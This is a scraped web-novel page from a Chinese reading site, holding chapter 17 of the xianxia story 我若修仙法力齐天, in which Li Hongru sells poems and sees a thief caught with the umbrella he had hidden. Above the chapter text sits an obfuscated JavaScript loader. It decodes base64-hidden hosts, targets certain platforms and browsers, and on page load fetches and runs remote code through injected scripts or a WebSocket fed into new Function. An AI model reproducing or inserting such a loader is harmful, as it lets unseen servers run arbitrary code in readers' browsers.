笔趣阁

字:
关灯 护眼
笔趣阁 > 我若修仙法力齐天 > 第十七章 白日挡灾
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第十七章 白日挡灾

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
观星楼需要一首溜须拍马的才气诗,但又不能明张目胆的滥用这首诗。
  李淳风寻思之下,定下了‘入局’的名次。
  做法时主打这首马屁诗,但必须拿一些诗词遮羞。
  这首小诗的位置不能显眼,也不能不显眼。
  “鸿儒兄,你真是有大才的人,欢迎你以后来尉迟府做客!”
  出观星楼时,尉迟宝琳态度相当客气。
  “我觉得鸿儒兄诗词能做魁首,观星楼亦小气了些,居然说卷面不整洁,用五十两纹银就打发了。”
  荣才俊拿着十两纹银,神情看上去有些不甘。
  “就是就是,鸿儒兄这是卖了三首诗,五十两确实少了点,要我看,五百两才合适。”
  尉迟宝琳附和上一声。
  他拿了五两纹银的报酬,情知这是给尉迟府面子,脸上过得去,心下倒也满足。
  “嘘,台正大人交代了不许咱们四处声张。”
  李鸿儒拿着五十两纹银,显得颇为高兴,顺道转移了两人的话题。
  这些诗词不是什么稀罕货,能拿来换上一些钱财再合适不过。
  别说五十两,就是五两十两他也满意。
  他李抄抄也是要生活的人,没可能靠着满腹诗书来填饱肚子。
  这相当于他做了一次买卖。
  更让李鸿儒开心的是,李淳风注意力更多放在诗文上,扫了两眼没将他认出来,这简直太棒了。
  一切事情都已经扫了尾。
  李鸿儒终于稳如老狗,不慌不忙。
  他低声与尉迟宝琳、荣才俊等人热聊。
  此番又乘机认识了几个有钱的酒囊饭袋,李鸿儒觉得大有收获。
  依这几个二代的智商,以后做出什么好的手工物品也方便推销。
  他常年在四门馆和一帮喜欢勾心斗角的文人二代做生意,李鸿儒早就觉得自己应该换一批交易对象。
  文人的钱不好骗,那都是李鸿儒使劲抠出来的,有时候还得亏本。
  从荣才俊的角度出发,望远镜交易观看《明庭经》一段时间明显是他大亏。
  但他还不得不做这种亏本生意。
  热议之时,只听人群一阵喧哗。
  随即数个身穿蓝色官服的人纵马奔来。
  “经大理寺六部审查,拘得白日鬼一名,此人手持赃物,于当铺处擒获。”
  一个脸色板正的官员下马宣读,随即数人从马上纵下,将那马上捆绑的‘白日鬼’推了下来。
  白日鬼并非鬼怪,而是小偷的某个名目。
  但凡白天都肆无忌惮的偷窃者,官方定义下来便叫‘白日鬼’。
  李鸿儒眼皮一抖,随即便见到了那白日鬼的赃物。
  太阴遮光伞。
  这是在深夜中能蒙蔽巡逻卫士感官的宝物,一次能遮挡数人。
  若是善用,这把伞便能发挥极为诡异强大的能力。
  李鸿儒记得自己都放到了猪笼中,没想到又被白日鬼给翻出来。
  这当真是自己找死,谁也拦不住。
  大理寺成员下手不轻,这个白日鬼手脚已经打断,此时躺在地上发出好一阵低低的哀嚎。
  李淳风从观星楼中走出,与那脸色板正的官员交谈数句,疑惑之时也点了点头。
  “告辞!”
  该做的事情已经做完,这官员顿时率众驾马而去。
  他来的快,走的也快,似是很不愿意与李淳风扯上关系。
  “似乎不是这小子,算了,反正是个白日鬼,到时拿去祭祀做法事也不冤!”
  李淳风与李鸿儒的距离并不远,竖着耳朵偷听时,李鸿儒亦听了个真切。
  他心下一哆嗦,喉咙顿时吞了一口苦水下肚。
  大抵他贪婪一分,将那太阴遮光伞带回家,此时下场与那白日鬼会并无多少区别。
  待得打断四肢,便是嘴皮子伶俐都没半分作用。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师